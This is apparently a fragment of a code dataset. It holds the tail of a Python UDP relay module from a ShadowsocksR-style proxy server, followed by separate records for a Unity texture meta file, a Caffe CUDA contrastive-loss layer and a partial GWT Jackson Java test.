logging.warn('header too short, maybe wrong password or '\n 'encryption method')\n return None\n return data\n\n def _pack_rsp_data(self, cmd, request_id, data):\n _rand_data = b\"123456789abcdefghijklmnopqrstuvwxyz\" * 2\n reqid_str = struct.pack(\">H\", request_id)\n return b''.join([CMD_VER_STR, common.chr(cmd), reqid_str, data, _rand_data[\n :random.randint(0, len(_rand_data))], reqid_str])\n\n def _handel_protocol_error(self, client_address, ogn_data):\n #raise Exception('can not parse header')\n logging.warn(\n \"Protocol ERROR, UDP ogn data %s from %s:%d\" %\n (binascii.hexlify(ogn_data), client_address[0], client_address[1]))\n if client_address[0] not in self.wrong_iplist and client_address[\n 0] != 0 and self.is_cleaning_wrong_iplist == False:\n self.wrong_iplist[client_address[0]] = time.time()\n\n def _get_relay_host(self, client_address, ogn_data):\n for id in self._relay_rules:\n if self._relay_rules[id]['port'] == 0:\n port = self._listen_port\n else:\n port = self._relay_rules[id]['port']\n return (self._relay_rules[id]['dist_ip'], int(port))\n return (None, None)\n\n def _handel_normal_relay(self, client_address, ogn_data):\n host, port = self._get_relay_host(client_address, ogn_data)\n self._encrypt_correct = False\n if port is None:\n raise Exception('can not parse header')\n data = b\"\\x03\" + common.to_bytes(common.chr(len(host))) + \\\n common.to_bytes(host) + struct.pack('>H', port)\n return (data + ogn_data, True)\n\n def _get_mu_relay_host(self, ogn_data, uid):\n\n if not uid:\n return (None, None)\n\n for id in self._relay_rules:\n if (self._relay_rules[id]['user_id'] == 0 and uid !=\n 0) or self._relay_rules[id]['user_id'] == uid:\n has_higher_priority = False\n for priority_id in self._relay_rules:\n if (\n (\n self._relay_rules[priority_id]['priority'] > self._relay_rules[id]['priority'] and self._relay_rules[id]['id'] != self._relay_rules[priority_id]['id']) or (\n self._relay_rules[priority_id]['priority'] == self._relay_rules[id]['priority'] and self._relay_rules[id]['id'] > self._relay_rules[priority_id]['id'])) and (\n self._relay_rules[priority_id]['user_id'] == uid or self._relay_rules[priority_id]['user_id'] == 0):\n has_higher_priority = True\n continue\n\n if has_higher_priority:\n continue\n\t\t\t\t\t\n if self._relay_rules[id]['dist_ip'] == '0.0.0.0':\n continue\n\n if 
self._relay_rules[id]['port'] == 0:\n port = self._listen_port\n else:\n port = self._relay_rules[id]['port']\n\n return (self._relay_rules[id]['dist_ip'], int(port))\n return (None, None)\n\n def _handel_mu_relay(self, client_address, ogn_data, uid):\n host, port = self._get_mu_relay_host(ogn_data, uid)\n if host is None:\n return (ogn_data, False)\n self._encrypt_correct = False\n if port is None:\n raise Exception('can not parse header')\n data = b\"\\x03\" + common.to_bytes(common.chr(len(host))) + \\\n common.to_bytes(host) + struct.pack('>H', port)\n return (data + ogn_data, True)\n\n def _is_relay(self, client_address, ogn_data, uid):\n if self._config['is_multi_user'] == 0:\n if self._get_relay_host(client_address, ogn_data) == (None, None):\n return False\n else:\n if self._get_mu_relay_host(ogn_data, uid) == (None, None):\n return False\n return True\n\n def _socket_bind_addr(self, sock, af, is_relay):\n bind_addr = ''\n if self._bind and af == socket.AF_INET:\n bind_addr = self._bind\n elif self._bindv6 and af == socket.AF_INET6:\n bind_addr = self._bindv6\n\n # bind_addr = bind_addr.replace(\"::ffff:\", \"\")\n # if bind_addr in self._ignore_bind_list:\n # bind_addr = None\n\n if is_relay:\n bind_addr = None\n\n if bind_addr:\n local_addrs = socket.getaddrinfo(\n bind_addr, 0, 0, socket.SOCK_STREAM, socket.SOL_TCP)\n if local_addrs[0][0] == af:\n logging.debug(\"bind %s\" % (bind_addr,))\n sock.bind((bind_addr, 0))\n\n def _handle_server(self):\n server = self._server_socket\n data, r_addr = server.recvfrom(BUF_SIZE)\n ogn_data = data\n if not data:\n logging.debug('UDP handle_server: data is empty')\n if self._stat_callback:\n self._stat_callback(self._listen_port, len(data))\n uid = None\n if self._is_local:\n frag = common.ord(data[2])\n if frag != 0:\n logging.warn('drop a message since frag is not 0')\n return\n else:\n data = data[3:]\n else:\n try:\n data, key, ref_iv = encrypt.decrypt_all(self._password,\n self._method,\n data)\n except Exception:\n logging.debug('UDP handle_server: decrypt data failed')\n return\n\n # decrypt data\n if not data:\n logging.debug('UDP handle_server: data is empty after decrypt')\n return\n ref_iv = [0]\n self._protocol.obfs.server_info.recv_iv = ref_iv[0]\n data, uid = self._protocol.server_udp_post_decrypt(data)\n\n if self._config['is_multi_user'] != 0 and data:\n if uid:\n if uid not in self.mu_server_transfer_ul:\n self.mu_server_transfer_ul[uid] = 0\n if uid not in self.mu_server_transfer_dl:\n self.mu_server_transfer_dl[uid] = 0\n if uid not in self.mu_connected_iplist:\n self.mu_connected_iplist[uid] = []\n if uid not in self.mu_detect_log_list:\n self.mu_detect_log_list[uid] = []\n\n if common.getRealIp(r_addr[0]) not in self.mu_connected_iplist[uid]:\n self.mu_connected_iplist[uid].append(common.getRealIp(r_addr[0]))\n\n else:\n raise Exception(\n 'This port is multi user in single port only,so The connection has been rejected, when connect from %s:%d via port %d' %\n (r_addr[0], r_addr[1], self._listen_port))\n\n is_relay = False\n\n #logging.info(\"UDP data %s\" % (binascii.hexlify(data),))\n if not self._is_local:\n\n if not self._is_relay(r_addr, ogn_data, uid):\n data = pre_parse_header(data)\n\n data = self._pre_parse_udp_header(data)\n if data is None:\n return\n\n if isinstance(data, tuple):\n return\n # return self._handle_tcp_over_udp(data, r_addr)\n else:\n if self._config[\"is_multi_user\"] == 0:\n data, is_relay = self._handel_normal_relay(r_addr, ogn_data)\n else:\n data, is_relay = self._handel_mu_relay(r_addr, 
ogn_data, uid)\n\n try:\n header_result = parse_header(data)\n except:\n self._handel_protocol_error(r_addr, ogn_data)\n return\n\n if header_result is None:\n self._handel_protocol_error(r_addr, ogn_data)\n return\n connecttype, addrtype, dest_addr, dest_port, header_length = header_result\n\n if self._is_local:\n addrtype = 3\n server_addr, server_port = self._get_a_server()\n else:\n server_addr, server_port = dest_addr, dest_port\n\n if (addrtype & 7) == 3:\n af = common.is_ip(server_addr)\n if af == False:\n handler = common.UDPAsyncDNSHandler((data, r_addr, uid, header_length, is_relay))\n handler.resolve(self._dns_resolver, (server_addr, server_port), self._handle_server_dns_resolved)\n else:\n self._handle_server_dns_resolved(\"\", (server_addr, server_port), server_addr, (data, r_addr, uid, header_length, is_relay))\n else:\n self._handle_server_dns_resolved(\"\", (server_addr, server_port), server_addr, (data, r_addr, uid, header_length, is_relay))\n\n def _handle_server_dns_resolved(self, error, remote_addr, server_addr, params):\n if error:\n return\n data, r_addr, uid, header_length, is_relay = params\n if uid is None:\n is_mu = False\n user_id = self._listen_port\n else:\n is_mu = True\n user_id = uid\n try:\n server_port = remote_addr[1]\n addrs = socket.getaddrinfo(server_addr, server_port, 0,\n socket.SOCK_DGRAM, socket.SOL_UDP)\n if not addrs: # drop\n return\n af, socktype, proto, canonname, sa = addrs[0]\n server_addr = sa[0]\n key = client_key(r_addr, af)\n client_pair = self._cache.get(key, None)\n if client_pair is None:\n client_pair = self._cache_dns_client.get(key, None)\n if client_pair is None:\n if self._forbidden_iplist:\n if common.to_str(sa[0]) in self._forbidden_iplist:\n logging.debug('IP %s is in forbidden list, drop' % common.to_str(sa[0]))\n # drop\n return\n if self._disconnect_ipset:\n if common.to_str(sa[0]) in self._disconnect_ipset:\n logging.debug('IP %s is in disconnect list, drop' % common.to_str(sa[0]))\n # drop\n return\n if self._forbidden_portset:\n if sa[1] in self._forbidden_portset:\n logging.debug('Port %d is in forbidden list, reject' % sa[1])\n # drop\n return\n\n if is_mu:\n if self.multi_user_table[uid]['_forbidden_iplist']:\n if common.to_str(sa[0]) in self.multi_user_table[uid]['_forbidden_iplist']:\n logging.debug('IP %s is in forbidden list, drop' % common.to_str(sa[0]))\n # drop\n return\n if self.multi_user_table[uid]['_disconnect_ipset']:\n if common.to_str(sa[0]) in self.multi_user_table[uid]['_disconnect_ipset']:\n logging.debug('IP %s is in disconnect list, drop' % common.to_str(sa[0]))\n # drop\n return\n if self.multi_user_table[uid]['_forbidden_portset']:\n if sa[1] in self.multi_user_table[uid]['_forbidden_portset']:\n logging.debug('Port %d is in forbidden list, reject' % sa[1])\n # drop\n return\n\n client = socket.socket(af, socktype, proto)\n client_uid = uid\n client.setblocking(False)\n self._socket_bind_addr(client, af, is_relay)\n is_dns = False\n if len(data) > header_length + 13 and data[header_length + 4 : header_length + 12] == b\"\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\":\n is_dns = True\n else:\n pass\n if sa[1] == 53 and is_dns: #DNS\n logging.debug(\"DNS query %s from %s:%d\" % (common.to_str(sa[0]), r_addr[0], r_addr[1]))\n self._cache_dns_client[key] = (client, uid)\n else:\n self._cache[key] = (client, uid)\n self._client_fd_to_server_addr[client.fileno()] = (r_addr, af)\n\n self._sockets.add(client.fileno())\n self._eventloop.add(client, eventloop.POLL_IN, self)\n\n logging.debug('UDP port %5d 
sockets %d' % (self._listen_port, len(self._sockets)))\n\n if not self.is_pushing_detect_text_list:\n for id in self.detect_text_list:\n if common.match_regex(\n self.detect_text_list[id]['regex'],\n str(data)):\n if self._config['is_multi_user'] != 0 and uid != 0:\n if self.is_cleaning_mu_detect_log_list == False and id not in self.mu_detect_log_list[\n uid]:\n self.mu_detect_log_list[uid].append(id)\n else:\n if self.is_cleaning_detect_log == False and id not in self.detect_log_list:\n self.detect_log_list.append(id)\n raise Exception(\n 'This connection match the regex: id:%d was reject,regex: %s ,connecting %s:%d from %s:%d via port %d' %\n (self.detect_text_list[id]['id'],\n self.detect_text_list[id]['regex'],\n common.to_str(server_addr),\n server_port,\n r_addr[0],\n r_addr[1],\n self._listen_port))\n if not self.is_pushing_detect_hex_list:\n for id in self.detect_hex_list:\n if common.match_regex(\n self.detect_hex_list[id]['regex'],\n binascii.hexlify(data)):\n if self._config['is_multi_user'] != 0 and uid != 0:\n if self.is_cleaning_mu_detect_log_list == False and id not in self.mu_detect_log_list[\n uid]:\n self.mu_detect_log_list[uid].append(id)\n else:\n if self.is_cleaning_detect_log == False and id not in self.detect_log_list:\n self.detect_log_list.append(id)\n raise Exception(\n 'This connection match the regex: id:%d was reject,regex: %s ,connecting %s:%d from %s:%d via port %d' %\n (self.detect_hex_list[id]['id'],\n self.detect_hex_list[id]['regex'],\n common.to_str(server_addr),\n server_port,\n r_addr[0],\n r_addr[1],\n self._listen_port))\n if not self._connect_hex_data:\n common.connect_log('UDP data to %s:%d from %s:%d via port %d' %\n (common.to_str(server_addr), server_port,\n r_addr[0], r_addr[1], self._listen_port))\n else:\n common.connect_log(\n 'UDP data to %s:%d from %s:%d via port %d,hex data : %s' %\n (common.to_str(server_addr),\n server_port,\n r_addr[0],\n r_addr[1],\n self._listen_port,\n binascii.hexlify(data)))\n if self._config['is_multi_user'] != 2:\n if common.to_str(r_addr[0]) in self.wrong_iplist and r_addr[\n 0] != 0 and self.is_cleaning_wrong_iplist == False:\n del self.wrong_iplist[common.to_str(r_addr[0])]\n if common.getRealIp(r_addr[0]) not in self.connected_iplist and r_addr[\n 0] != 0 and self.is_cleaning_connected_iplist == False:\n self.connected_iplist.append(common.getRealIp(r_addr[0]))\n else:\n client, client_uid = client_pair\n self._cache.clear(self._udp_cache_size)\n self._cache_dns_client.clear(16)\n\n if self._is_local:\n try:\n key, ref_iv, m = encrypt.gen_key_iv(self._password, self._method)\n self._protocol.obfs.server_info.iv = ref_iv[0]\n data = self._protocol.client_udp_pre_encrypt(data)\n #logging.debug(\"%s\" % (binascii.hexlify(data),))\n data = encrypt.encrypt_all_m(key, ref_iv, m, self._method, data)\n except Exception:\n logging.debug(\"UDP handle_server: encrypt data failed\")\n return\n if not data:\n return\n else:\n data = data[header_length:]\n if not data:\n return\n except Exception as e:\n shell.print_exception(e)\n if self._config['verbose']:\n traceback.print_exc()\n logging.error(\"exception from user %d\" % (user_id,))\n\n try:\n client.sendto(data, (server_addr, server_port))\n self.add_transfer_u(client_uid, len(data))\n if client_pair is None: # new request\n addr, port = client.getsockname()[:2]\n common.connect_log('UDP data to %s(%s):%d from %s:%d by user %d' %\n (common.to_str(remote_addr[0]), common.to_str(server_addr), server_port, addr, port, user_id))\n except IOError as e:\n err = 
eventloop.errno_from_exception(e)\n logging.warning('IOError sendto %s:%d by user %d' % (server_addr, server_port, user_id))\n if err in (errno.EINPROGRESS, errno.EAGAIN):\n pass\n else:\n shell.print_exception(e)\n\n def _handle_client(self, sock):\n data, r_addr = sock.recvfrom(BUF_SIZE)\n if not data:\n logging.debug('UDP handle_client: data is empty')\n return\n if self._stat_callback:\n self._stat_callback(self._listen_port, len(data))\n\n client_addr = self._client_fd_to_server_addr.get(sock.fileno())\n client_uid = None\n if client_addr:\n key = client_key(client_addr[0], client_addr[1])\n client_pair = self._cache.get(key, None)\n client_dns_pair = self._cache_dns_client.get(key, None)\n if client_pair:\n client, client_uid = client_pair\n elif client_dns_pair:\n client, client_uid = client_dns_pair\n\n if not self._is_local:\n addrlen = len(r_addr[0])\n if addrlen > 255:\n # drop\n return\n\n origin_data = data[:]\n\n data = pack_addr(r_addr[0]) + struct.pack('>H', r_addr[1]) + data\n try:\n ref_iv = [encrypt.encrypt_new_iv(self._method)]\n self._protocol.obfs.server_info.iv = ref_iv[0]\n data = self._protocol.server_udp_pre_encrypt(data, client_uid)\n response = encrypt.encrypt_all(self._password,\n self._method, data)\n except Exception:\n logging.debug(\"UDP handle_client: encrypt data failed\")\n return\n if not response:\n return\n else:\n try:\n data, key, ref_iv = encrypt.decrypt_all(self._password,\n self._method, data)\n except Exception:\n logging.debug('UDP handle_client: decrypt data failed')\n return\n if not data:\n return\n self._protocol.obfs.server_info.recv_iv = ref_iv[0]\n data = self._protocol.client_udp_post_decrypt(data)\n header_result = parse_header(data)\n if header_result is None:\n return\n #connecttype, dest_addr, dest_port, header_length = header_result\n #logging.debug('UDP handle_client %s:%d to %s:%d' % (common.to_str(r_addr[0]), r_addr[1], dest_addr, dest_port))\n\n response = b'\\x00\\x00\\x00' + data\n\n if client_addr:\n if client_uid:\n self.add_transfer_d(client_uid, len(response))\n else:\n self.server_transfer_dl += len(response)\n\n if self._is_relay(r_addr, origin_data, client_uid):\n response = origin_data\n\n self.write_to_server_socket(response, client_addr[0])\n if client_dns_pair:\n logging.debug(\n \"remove dns client %s:%d\" %\n (client_addr[0][0], client_addr[0][1]))\n del self._cache_dns_client[key]\n self._close_client(client_dns_pair[0])\n else:\n # this packet is from somewhere else we know\n # simply drop that packet\n pass\n\n def write_to_server_socket(self, data, addr):\n uncomplete = False\n retry = 0\n try:\n self._server_socket.sendto(data, addr)\n data = None\n while self._data_to_write_to_server_socket:\n data_buf = self._data_to_write_to_server_socket[0]\n retry = data_buf[1] + 1\n del self._data_to_write_to_server_socket[0]\n data, addr = data_buf[0]\n self._server_socket.sendto(data, addr)\n except (OSError, IOError) as e:\n error_no = eventloop.errno_from_exception(e)\n uncomplete = True\n if error_no in (errno.EWOULDBLOCK,):\n pass\n else:\n shell.print_exception(e)\n return False\n # if uncomplete and data is not None and retry < 3:\n # self._data_to_write_to_server_socket.append([(data, addr), retry])\n #'''\n\n def add_to_loop(self, loop):\n if self._eventloop:\n raise Exception('already add to loop')\n if self._closed:\n raise Exception('already closed')\n self._eventloop = loop\n\n server_socket = self._server_socket\n self._eventloop.add(server_socket,\n eventloop.POLL_IN | eventloop.POLL_ERR, self)\n 
loop.add_periodic(self.handle_periodic)\n\n def remove_handler(self, handler):\n index = self._handler_to_timeouts.get(hash(handler), -1)\n if index >= 0:\n # delete is O(n), so we just set it to None\n self._timeouts[index] = None\n del self._handler_to_timeouts[hash(handler)]\n\n def update_activity(self, handler):\n # set handler to active\n now = int(time.time())\n if now - handler.last_activity < eventloop.TIMEOUT_PRECISION:\n # thus we can lower timeout modification frequency\n return\n handler.last_activity = now\n index = self._handler_to_timeouts.get(hash(handler), -1)\n if index >= 0:\n # delete is O(n), so we just set it to None\n self._timeouts[index] = None\n length = len(self._timeouts)\n self._timeouts.append(handler)\n self._handler_to_timeouts[hash(handler)] = length\n\n def _sweep_timeout(self):\n # tornado's timeout memory management is more flexible than we need\n # we just need a sorted last_activity queue and it's faster than heapq\n # in fact we can do O(1) insertion/remove so we invent our own\n if self._timeouts:\n logging.log(shell.VERBOSE_LEVEL, 'sweeping timeouts')\n now = time.time()\n length = len(self._timeouts)\n pos = self._timeout_offset\n while pos < length:\n handler = self._timeouts[pos]\n if handler:\n if now - handler.last_activity < self._timeout:\n break\n else:\n if handler.remote_address:\n logging.debug('timed out: %s:%d' %\n handler.remote_address)\n else:\n logging.debug('timed out')\n handler.destroy()\n handler.destroy_local()\n self._timeouts[pos] = None # free memory\n pos += 1\n else:\n pos += 1\n if pos > TIMEOUTS_CLEAN_SIZE and pos > length >> 1:\n # clean up the timeout queue when it gets larger than half\n # of the queue\n self._timeouts = self._timeouts[pos:]\n for key in self._handler_to_timeouts:\n self._handler_to_timeouts[key] -= pos\n pos = 0\n self._timeout_offset = pos\n\n def handle_event(self, sock, fd, event):\n if sock == self._server_socket:\n if event & eventloop.POLL_ERR:\n logging.error('UDP server_socket err')\n try:\n self._handle_server()\n except Exception as e:\n shell.print_exception(e)\n if self._config['verbose']:\n traceback.print_exc()\n elif sock and (fd in self._sockets):\n if event & eventloop.POLL_ERR:\n logging.error('UDP client_socket err')\n try:\n self._handle_client(sock)\n except Exception as e:\n shell.print_exception(e)\n if self._config['verbose']:\n traceback.print_exc()\n else:\n if sock:\n handler = self._fd_to_handlers.get(fd, None)\n if handler:\n handler.handle_event(sock, event)\n else:\n logging.warn('poll removed fd')\n\n def handle_periodic(self):\n if self._closed:\n self._cache.clear(0)\n self._cache_dns_client.clear(0)\n if self._eventloop:\n self._eventloop.remove_periodic(self.handle_periodic)\n self._eventloop.remove(self._server_socket)\n if self._server_socket:\n self._server_socket.close()\n self._server_socket = None\n logging.info('closed UDP port %d', self._listen_port)\n else:\n before_sweep_size = len(self._sockets)\n self._cache.sweep()\n self._cache_dns_client.sweep()\n if before_sweep_size != len(self._sockets):\n logging.debug(\n 'UDP port %5d sockets %d' %\n (self._listen_port, len(\n self._sockets)))\n self._sweep_timeout()\n\n def connected_iplist_clean(self):\n self.is_cleaninglist = True\n del self.connected_iplist[:]\n self.is_cleaning_connected_iplist = False\n\n def mu_connected_iplist_clean(self):\n self.is_cleaning_mu_connected_iplist = True\n for id in self.mu_connected_iplist:\n del self.mu_connected_iplist[id][:]\n self.is_cleaning_mu_connected_iplist = 
False\n\n def wrong_iplist_clean(self):\n self.is_cleaning_wrong_iplist = True\n\n temp_new_list = {}\n for key in self.wrong_iplist:\n if self.wrong_iplist[key] > time.time() - 60:\n temp_new_list[key] = self.wrong_iplist[key]\n\n self.wrong_iplist = temp_new_list.copy()\n\n self.is_cleaning_wrong_iplist = True\n\n def detect_log_list_clean(self):\n self.is_cleaning_detect_log = True\n del self.detect_log_list[:]\n self.is_cleaning_detect_log = False\n\n def mu_detect_log_list_clean(self):\n self.is_cleaning_mu_detect_log_list = True\n for id in self.mu_detect_log_list:\n del self.mu_detect_log_list[id][:]\n self.is_cleaning_mu_detect_log_list = False\n\n def reset_single_multi_user_traffic(self, user_id):\n if user_id in self.mu_server_transfer_ul:\n self.mu_server_transfer_ul[user_id] = 0\n if user_id in self.mu_server_transfer_dl:\n self.mu_server_transfer_dl[user_id] = 0\n\n def modify_detect_text_list(self, new_list):\n self.is_pushing_detect_text_list = True\n self.detect_text_list = new_list.copy()\n self.is_pushing_detect_text_list = False\n\n def modify_detect_hex_list(self, new_list):\n self.is_pushing_detect_hex_list = True\n self.detect_hex_list = new_list.copy()\n self.is_pushing_detect_hex_list = False\n\n def modify_multi_user_table(self, new_table):\n self.multi_user_table = new_table.copy()\n self.multi_user_host_table = {}\n\n self._protocol.obfs.server_info.users = self.multi_user_table\n\n for id in self.multi_user_table:\n self.multi_user_host_table[common.get_mu_host(\n id, self.multi_user_table[id]['md5'])] = id\n if self.multi_user_table[id]['forbidden_ip'] is not None:\n self.multi_user_table[id]['_forbidden_iplist'] = IPNetwork(\n str(self.multi_user_table[id]['forbidden_ip']))\n else:\n self.multi_user_table[id][\n '_forbidden_iplist'] = IPNetwork(str(\"\"))\n if self.multi_user_table[id]['disconnect_ip'] is not None:\n self.multi_user_table[id]['_disconnect_ipset'] = IPNetwork(\n str(self.multi_user_table[id]['disconnect_ip']))\n else:\n self.multi_user_table[id]['_disconnect_ipset'] = None\n if self.multi_user_table[id]['forbidden_port'] is not None:\n self.multi_user_table[id]['_forbidden_portset'] = PortRange(\n str(self.multi_user_table[id]['forbidden_port']))\n else:\n self.multi_user_table[id][\n '_forbidden_portset'] = PortRange(str(\"\"))\n\n def push_relay_rules(self, rules):\n self._is_pushing_relay_rules = True\n self._relay_rules = rules.copy()\n self._is_pushing_relay_rules = False\n\n def close(self, next_tick=False):\n logging.debug('UDP close')\n self._closed = True\n if not next_tick:\n if self._eventloop:\n self._eventloop.remove_periodic(self.handle_periodic)\n self._eventloop.remove(self._server_socket)\n self._server_socket.close()\n self._cache.clear(0)\n self._cache_dns_client.clear(0)\n"} {"text": "fileFormatVersion: 2\nguid: 5979e13c57f69d542883bb8532860b59\nTextureImporter:\n internalIDToNameTable: []\n externalObjects: {}\n serializedVersion: 8\n mipmaps:\n mipMapMode: 0\n enableMipMap: 1\n sRGBTexture: 0\n linearTexture: 0\n fadeOut: 0\n borderMipMap: 0\n mipMapsPreserveCoverage: 0\n alphaTestReferenceValue: 0.5\n mipMapFadeDistanceStart: 1\n mipMapFadeDistanceEnd: 3\n bumpmap:\n convertToNormalMap: 0\n externalNormalMap: 0\n heightScale: 0.25\n normalMapFilter: 0\n isReadable: 0\n streamingMipmaps: 0\n streamingMipmapsPriority: 0\n grayScaleToAlpha: 0\n generateCubemap: 6\n cubemapConvolution: 0\n seamlessCubemap: 0\n textureFormat: 1\n maxTextureSize: 2048\n textureSettings:\n serializedVersion: 2\n filterMode: -1\n aniso: 4\n 
mipBias: -1\n wrapU: -1\n wrapV: -1\n wrapW: -1\n nPOTScale: 1\n lightmap: 0\n compressionQuality: 50\n spriteMode: 0\n spriteExtrude: 1\n spriteMeshType: 1\n alignment: 0\n spritePivot: {x: 0.5, y: 0.5}\n spritePixelsToUnits: 100\n spriteBorder: {x: 0, y: 0, z: 0, w: 0}\n spriteGenerateFallbackPhysicsShape: 1\n alphaUsage: 1\n alphaIsTransparency: 0\n spriteTessellationDetail: -1\n textureType: 1\n textureShape: 1\n singleChannelComponent: 0\n maxTextureSizeSet: 0\n compressionQualitySet: 0\n textureFormatSet: 0\n platformSettings:\n - serializedVersion: 2\n buildTarget: DefaultTexturePlatform\n maxTextureSize: 2048\n resizeAlgorithm: 0\n textureFormat: -1\n textureCompression: 2\n compressionQuality: 50\n crunchedCompression: 0\n allowsAlphaSplitting: 0\n overridden: 0\n androidETC2FallbackOverride: 0\n - serializedVersion: 2\n buildTarget: Standalone\n maxTextureSize: 2048\n resizeAlgorithm: 0\n textureFormat: -1\n textureCompression: 2\n compressionQuality: 50\n crunchedCompression: 0\n allowsAlphaSplitting: 0\n overridden: 0\n androidETC2FallbackOverride: 0\n - serializedVersion: 2\n buildTarget: iPhone\n maxTextureSize: 8192\n resizeAlgorithm: 0\n textureFormat: -1\n textureCompression: 1\n compressionQuality: 50\n crunchedCompression: 0\n allowsAlphaSplitting: 0\n overridden: 0\n androidETC2FallbackOverride: 0\n - serializedVersion: 2\n buildTarget: Android\n maxTextureSize: 8192\n resizeAlgorithm: 0\n textureFormat: -1\n textureCompression: 1\n compressionQuality: 50\n crunchedCompression: 0\n allowsAlphaSplitting: 0\n overridden: 0\n androidETC2FallbackOverride: 0\n - serializedVersion: 2\n buildTarget: Windows Store Apps\n maxTextureSize: 8192\n resizeAlgorithm: 0\n textureFormat: -1\n textureCompression: 1\n compressionQuality: 50\n crunchedCompression: 0\n allowsAlphaSplitting: 0\n overridden: 0\n androidETC2FallbackOverride: 0\n spriteSheet:\n serializedVersion: 2\n sprites: []\n outline: []\n physicsShape: []\n bones: []\n spriteID: \n internalID: 0\n vertices: []\n indices: \n edges: []\n weights: []\n spritePackingTag: \n pSDRemoveMatte: 0\n pSDShowRemoveMatteOption: 0\n userData: \n assetBundleName: \n assetBundleVariant: \n"} {"text": "#include \n#include \n\n#include \"caffe/layers/contrastive_loss_layer.hpp\"\n#include \"caffe/util/math_functions.hpp\"\n\nnamespace caffe {\n\ntemplate \nvoid ContrastiveLossLayer::Forward_gpu(\n const vector*>& bottom, const vector*>& top) {\n const int count = bottom[0]->count();\n caffe_gpu_sub(\n count,\n bottom[0]->gpu_data(), // a\n bottom[1]->gpu_data(), // b\n diff_.mutable_gpu_data()); // a_i-b_i\n caffe_gpu_powx(\n count,\n diff_.mutable_gpu_data(), // a_i-b_i\n Dtype(2),\n diff_sq_.mutable_gpu_data()); // (a_i-b_i)^2\n caffe_gpu_gemv(\n CblasNoTrans,\n bottom[0]->num(),\n bottom[0]->channels(),\n Dtype(1.0),\n diff_sq_.gpu_data(), // (a_i-b_i)^2\n summer_vec_.gpu_data(),\n Dtype(0.0),\n dist_sq_.mutable_gpu_data()); // \\Sum (a_i-b_i)^2\n Dtype margin = this->layer_param_.contrastive_loss_param().margin();\n bool legacy_version =\n this->layer_param_.contrastive_loss_param().legacy_version();\n Dtype loss(0.0);\n for (int i = 0; i < bottom[0]->num(); ++i) {\n if (static_cast(bottom[2]->cpu_data()[i])) { // similar pairs\n loss += dist_sq_.cpu_data()[i];\n } else { // dissimilar pairs\n if (legacy_version) {\n loss += std::max(margin - dist_sq_.cpu_data()[i], Dtype(0.0));\n } else {\n Dtype dist = std::max(margin - sqrt(dist_sq_.cpu_data()[i]),\n Dtype(0.0));\n loss += dist*dist;\n }\n }\n }\n loss = loss / 
static_cast(bottom[0]->num()) / Dtype(2);\n top[0]->mutable_cpu_data()[0] = loss;\n}\n\ntemplate \n__global__ void CLLBackward(const int count, const int channels,\n const Dtype margin, const bool legacy_version, const Dtype alpha,\n const Dtype* y, const Dtype* diff, const Dtype* dist_sq,\n Dtype *bottom_diff) {\n CUDA_KERNEL_LOOP(i, count) {\n int n = i / channels; // the num index, to access y and dist_sq\n if (static_cast(y[n])) { // similar pairs\n bottom_diff[i] = alpha * diff[i];\n } else { // dissimilar pairs\n Dtype mdist(0.0);\n Dtype beta(0.0);\n if (legacy_version) {\n mdist = (margin - dist_sq[n]);\n beta = -alpha;\n } else {\n Dtype dist = sqrt(dist_sq[n]);\n mdist = (margin - dist);\n beta = -alpha * mdist / (dist + Dtype(1e-4)) * diff[i];\n }\n if (mdist > 0.0) {\n bottom_diff[i] = beta;\n } else {\n bottom_diff[i] = 0;\n }\n }\n }\n}\n\ntemplate \nvoid ContrastiveLossLayer::Backward_gpu(const vector*>& top,\n const vector& propagate_down, const vector*>& bottom) {\n for (int i = 0; i < 2; ++i) {\n if (propagate_down[i]) {\n const int count = bottom[0]->count();\n const int channels = bottom[0]->channels();\n Dtype margin = this->layer_param_.contrastive_loss_param().margin();\n const bool legacy_version =\n this->layer_param_.contrastive_loss_param().legacy_version();\n const Dtype sign = (i == 0) ? 1 : -1;\n const Dtype alpha = sign * top[0]->cpu_diff()[0] /\n static_cast(bottom[0]->num());\n // NOLINT_NEXT_LINE(whitespace/operators)\n CLLBackward<<>>(\n count, channels, margin, legacy_version, alpha,\n bottom[2]->gpu_data(), // pair similarity 0 or 1\n diff_.gpu_data(), // the cached eltwise difference between a and b\n dist_sq_.gpu_data(), // the cached square distance between a and b\n bottom[i]->mutable_gpu_diff());\n CUDA_POST_KERNEL_CHECK;\n }\n }\n}\n\nINSTANTIATE_LAYER_GPU_FUNCS(ContrastiveLossLayer);\n\n} // namespace caffe\n"} {"text": "/*\n * Copyright 2013 Nicolas Morel\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage com.github.nmorel.gwtjackson.client.mapper;\n\nimport com.github.nmorel.gwtjackson.client.GwtJacksonTestCase;\nimport com.github.nmorel.gwtjackson.client.JsonSerializationContext;\nimport com.github.nmorel.gwtjackson.client.ObjectWriter;\nimport com.github.nmorel.gwtjackson.shared.mapper.SimpleBeanJsonMapperTester;\nimport com.github.nmorel.gwtjackson.shared.model.SimpleBean;\nimport com.google.gwt.core.client.GWT;\n\n/**\n * @author Nicolas Morel\n */\npublic class SimpleBeanObjectWriterTest extends GwtJacksonTestCase {\n\n public static interface SimpleBeanMapper extends ObjectWriter {\n\n static SimpleBeanMapper INSTANCE = GWT.create( SimpleBeanMapper.class );\n }\n\n private SimpleBeanJsonMapperTester tester = SimpleBeanJsonMapperTester.INSTANCE;\n\n public void testSerializeValue() {\n tester.testSerializeValue( createWriter( SimpleBeanMapper.INSTANCE ) );\n }\n\n public void testWriteBeanWithNullProperties() {\n tester.testWriteWithNullProperties( createWriter( SimpleBeanMapper.INSTANCE, 
